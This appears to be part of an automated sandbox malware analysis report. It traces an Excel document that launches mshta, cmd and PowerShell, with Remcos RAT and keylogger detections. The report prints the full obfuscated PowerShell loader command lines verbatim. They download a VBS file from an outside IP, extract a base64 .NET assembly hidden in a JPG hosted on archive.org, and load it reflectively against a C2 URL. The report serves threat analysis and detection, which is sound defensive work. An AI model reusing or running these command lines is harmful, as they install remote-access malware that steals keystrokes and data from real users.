                                                                                                                                                                                                                    Data Ascii: "!v$&)!Ow:pitvW?8U9IHn0$au` E{Yd&2WL=6ln+F+H=p>>;mi{5"XkebKx'LURx:jANPSd`i3P8Lv6
                                                                                                                                                                                                                    2024-10-08 13:24:16 UTC16384INData Raw: 36 a4 9e 08 cc 94 d7 29 50 ad a6 0c 47 bb ff 00 fa 38 3d 4f 89 22 91 5a 52 40 eb 4f c7 f2 c0 d7 7d 44 25 54 02 d4 0f 3f 1c ef 32 33 54 8d f3 39 95 1e ba 29 53 71 d3 6d 07 a7 af fe 98 47 f1 08 c4 60 22 50 1f e6 ff 00 a6 03 af 22 75 22 89 e9 83 f3 d7 a1 4e 7b 1c cf 7d 68 75 07 cb 22 bb 06 eb ff 00 87 21 35 eb e6 57 92 47 c4 b7 fd 30 34 9d d1 9a ca 9e 7d b2 a5 c8 53 b5 5b eb 8b 36 b9 0a f0 95 ff 00 17 fd 32 a7 5e 40 a1 16 ef f8 bf e9 80 c1 d4 99 14 54 75 b7 f5 cb 89 14 29 40 80 1f c5 ce 27 f7 b7 5f 56 ca f8 06 ff 00 a6 0d b5 e7 ff 00 a3 62 7a fe 2f ff 00 47 01 d4 74 0c 09 8c dd f4 ae 0e 2d ac d7 3c 5a a2 13 d2 80 70 36 8c 85 d6 b6 d2 44 6c 19 45 82 5b fe 98 87 9c 4b 16 91 37 b3 1b fc 5f f4 c0 68 f8 d4 a7 d2 63 52 7b 15 5c d8 8e 7f 07 6d 27 df 75 69 e2 91 b1
                                                                                                                                                                                                                    Data Ascii: 6)PG8=O"ZR@O}D%T?23T9)SqmG`"P"u"N{}hu"!5WG04}S[62^@Tu)@'_Vbz/Gt-<Zp6DlE[K7_hcR{\m'ui
                                                                                                                                                                                                                    2024-10-08 13:24:16 UTC16384INData Raw: 8b 3d 6c 75 ca bc 9b a3 2a dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d
                                                                                                                                                                                                                    Data Ascii: =lu*q( k`2vQ$(^2`D_)PRH?<]`GJ|"(oW$GSW<D}#8{[k$*@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR<* tU"Ye6EV|z,y<=]
                                                                                                                                                                                                                    2024-10-08 13:24:16 UTC16384INData Raw: 2d 4a 56 e8 73 fc c6 65 1d 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28
                                                                                                                                                                                                                    Data Ascii: -JVse62u*pG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH*}XMO(
                                                                                                                                                                                                                    2024-10-08 13:24:16 UTC16384INData Raw: 18 01 03 9c 90 0f bf 6c b9 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93
                                                                                                                                                                                                                    Data Ascii: l<U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h|b@?_{%iJ_$U`L|
                                                                                                                                                                                                                    2024-10-08 13:24:16 UTC16384INData Raw: b1 5f 33 d1 61 7e 27 ae 71 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad
                                                                                                                                                                                                                    Data Ascii: _3a~'qe`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pW
                                                                                                                                                                                                                    2024-10-08 13:24:16 UTC16384INData Raw: 47 b2 68 df 68 89 dd 18 31 e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a
                                                                                                                                                                                                                    Data Ascii: Ghh1is"ydPTg_4wA|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytx*n|6^xq]*$nSx6(H1VFRd$z


                                                                                                                                                                                                                    Statistics

                                                                                                                                                                                                                    CPU Usage

                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                    Memory Usage

                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                    High Level Behavior Distribution

                                                                                                                                                                                                                    Click to dive into process behavior distribution

                                                                                                                                                                                                                    Behavior

                                                                                                                                                                                                                    Click to jump to process

                                                                                                                                                                                                                    System Behavior

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:0
                                                                                                                                                                                                                    Start time:09:23:14
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                                                                                                                    Imagebase:0x13f880000
                                                                                                                                                                                                                    File size:28'253'536 bytes
                                                                                                                                                                                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:false

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:4
                                                                                                                                                                                                                    Start time:09:23:40
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\mshta.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\System32\mshta.exe -Embedding
                                                                                                                                                                                                                    Imagebase:0x13fed0000
                                                                                                                                                                                                                    File size:13'824 bytes
                                                                                                                                                                                                                    MD5 hash:95828D670CFD3B16EE188168E083C3C5
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:5
                                                                                                                                                                                                                    Start time:09:23:43
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\system32\cmd.exe" "/C PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                                                                                                                                                                                                                    Imagebase:0x4a080000
                                                                                                                                                                                                                    File size:345'088 bytes
                                                                                                                                                                                                                    MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:7
                                                                                                                                                                                                                    Start time:09:23:44
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:PoweRshElL -eX bypaSS -NOp -W 1 -c devicEcREdEnTiaLDePloyment ; ieX($(IeX('[SYSTem.tEXt.EnCOdiNG]'+[CHar]0X3A+[cHaR]0x3a+'Utf8.GEtSTRINg([SYSTem.coNVeRT]'+[cHaR]58+[CHaR]58+'FroMbaSE64StriNg('+[CHar]0X22+'JFVEcFcyQ0dRM0RLICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC1UeVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW1lTWJFckRlRklOSVRpT04gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMbU9OIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgdE1ZbUpnaixzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBtRnlWTWhXLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGV6WEVQaix1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWmVpeGRab1ZELEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG11bGNlZkJaKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5hTUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiRCIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFtZXNQYUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVGhTY0hVSUkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFVEcFcyQ0dRM0RLOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMjIwLjQwLzMzMC92ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnRJRiIsIiRlTlY6QVBQREFUQVx2ZXJ5YmVzdHRoaW5nc3dlc2hhcmVkZm9ybmV3LnZiUyIsMCwwKTtTVGFyVC1TbEVFUCgzKTtTdGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW5WOkFQUERBVEFcdmVyeWJlc3R0aGluZ3N3ZXNoYXJlZGZvcm5ldy52YlMi'+[ChaR]34+'))')))"
                                                                                                                                                                                                                    Imagebase:0x13fda0000
                                                                                                                                                                                                                    File size:443'392 bytes
                                                                                                                                                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:8
                                                                                                                                                                                                                    Start time:09:23:47
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\uvrrkyhh\uvrrkyhh.cmdline"
                                                                                                                                                                                                                    Imagebase:0x13fa80000
                                                                                                                                                                                                                    File size:2'758'280 bytes
                                                                                                                                                                                                                    MD5 hash:23EE3D381CFE3B9F6229483E2CE2F9E1
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:9
                                                                                                                                                                                                                    Start time:09:23:47
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES3ED5.tmp" "c:\Users\user\AppData\Local\Temp\uvrrkyhh\CSC53416C506E684743ABB03B3747B68267.TMP"
                                                                                                                                                                                                                    Imagebase:0x13f030000
                                                                                                                                                                                                                    File size:52'744 bytes
                                                                                                                                                                                                                    MD5 hash:C877CBB966EA5939AA2A17B6A5160950
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:11
                                                                                                                                                                                                                    Start time:09:23:52
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\wscript.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\verybestthingswesharedfornew.vbS"
                                                                                                                                                                                                                    Imagebase:0xff790000
                                                                                                                                                                                                                    File size:168'960 bytes
                                                                                                                                                                                                                    MD5 hash:045451FA238A75305CC26AC982472367
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:high
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:12
                                                                                                                                                                                                                    Start time:09:23:52
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnezF9aW1hZ2VVcmwnKycgPSAnKyd7MH1odHRwczovL2lhNjAwMTAyLnVzLmFyY2hpdmUub3JnLzMyL2l0ZW1zL2RldGFoLW5vdGUtdl8yMDI0MTAvRGV0YWhOb3QnKydlX1YuanBnIHswfTt7MX13ZWJDJysnbGllbnQgPSBOJysnZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3sxfWltJysnYWdlQnl0ZXMgPSB7MX13ZWJDbGllbnQnKycuRG93bmxvYWREYXRhKHsxfWltYWdlVScrJ3JsKTt7MX1pbWFnZVRleHQgPSBbU3lzdGVtLlQnKydleHQuJysnRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7JysnMX1zdGFydEZsYWcgPSB7MH08JysnPEJBU0U2NF9TVEFSVD4+ezB9JysnO3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWltYWdlVGV4dC4nKydJbmRleE9mKHsxfWVuZEZsYWcpO3sxfXN0YXJ0SW5kZXggJysnLWdlIDAgLWFuZCB7MX0nKydlbmRJbmRleCAtZ3QgezF9c3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7eycrJzF9YmEnKydzZTY0TGVuZ3RoID0gezEnKyd9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzICcrJz0gW1N5cycrJ3RlbS5Db252ZXJ0XTo6RnJvJysnbUJhc2U2NFMnKyd0cmluZyh7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0nKycuUmVmbGVjdGlvbi5Bc3NlbWJsJysneV06OkxvYWQoezF9Y29tbWFuZEJ5dGVzKTt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkknKydudm9rZSh7MX1udWxsLCBAKHswfXR4dC5IR0dDUlIvMDMzLzA0LjAyMi4zLjI5MS8vJysnOnB0dGh7MH0sIHswfWRlc2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MH0sICcrJ3swfWRlcycrJ2F0aXZhZG97MH0sIHswfVJlZ0FzbXswfSwgezB9ZGVzYXRpdmFkb3snKycwfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRiBbQ2hhcl0zOSxbQ2hhcl0zNil8IGludm9rZS1leHByZXNTSW9u';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                                                                                                                                                                                                                    Imagebase:0x13fda0000
                                                                                                                                                                                                                    File size:443'392 bytes
                                                                                                                                                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:14
                                                                                                                                                                                                                    Start time:09:23:53
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                    Wow64 process (32bit):false
                                                                                                                                                                                                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('{1}imageUrl'+' = '+'{0}https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNot'+'e_V.jpg {0};{1}webC'+'lient = N'+'ew-Object System.Net.WebClient;{1}im'+'ageBytes = {1}webClient'+'.DownloadData({1}imageU'+'rl);{1}imageText = [System.T'+'ext.'+'Encoding]::UTF8.GetString({1}imageBytes);{'+'1}startFlag = {0}<'+'<BASE64_START>>{0}'+';{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}imageText.'+'IndexOf({1}endFlag);{1}startIndex '+'-ge 0 -and {1}'+'endIndex -gt {1}startIndex;{1}startIndex += {1}startFlag.Length;{'+'1}ba'+'se64Length = {1'+'}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes '+'= [Sys'+'tem.Convert]::Fro'+'mBase64S'+'tring({1}base64Command);{1}loadedAssembly = [System'+'.Reflection.Assembl'+'y]::Load({1}commandBytes);{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.I'+'nvoke({1}null, @({0}txt.HGGCRR/033/04.022.3.291//'+':ptth{0}, {0}desativado{0}, {0}desativado{0}, '+'{0}des'+'ativado{0}, {0}RegAsm{0}, {0}desativado{'+'0}, {0}desativado{0}));') -F [Char]39,[Char]36)| invoke-expresSIon"
                                                                                                                                                                                                                    Imagebase:0x13fda0000
                                                                                                                                                                                                                    File size:443'392 bytes
                                                                                                                                                                                                                    MD5 hash:A575A7610E5F003CC36DF39E07C4BA7D
                                                                                                                                                                                                                    Has elevated privileges:true
                                                                                                                                                                                                                    Has administrator privileges:true
                                                                                                                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                                                                                                                    Yara matches:
                                                                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.490672178.0000000014A70000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                    • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000000E.00000002.490672178.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000000E.00000002.490672178.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000E.00000002.490672178.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                    • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000000E.00000002.490672178.00000000129B1000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                                    Reputation:moderate
                                                                                                                                                                                                                    Has exited:true

                                                                                                                                                                                                                    General

                                                                                                                                                                                                                    Target ID:15
                                                                                                                                                                                                                    Start time:09:23:58
                                                                                                                                                                                                                    Start date:08/10/2024
                                                                                                                                                                                                                    Path:C:\Windows\System32\mshta.exe
